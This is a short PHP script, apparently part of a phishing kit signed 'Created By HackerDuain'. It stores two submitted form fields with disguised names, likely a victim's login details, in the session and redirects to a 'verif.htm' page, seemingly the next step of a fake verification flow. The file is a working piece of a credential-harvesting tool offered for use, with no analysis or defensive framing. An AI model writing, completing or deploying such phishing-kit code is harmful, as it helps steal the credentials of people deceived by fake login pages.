<?php
###################################
// Don't change anything here
// Created By HackerDuain
###################################

session_start() ;

$_SESSION['x0r1'] = $_POST['x0r1'];
$_SESSION['x0r2'] = $_POST['x0r2'];


//Location: The location where the user will be redirected after the script executes the commands. You can change it.
header("Location: verif.htm");

?>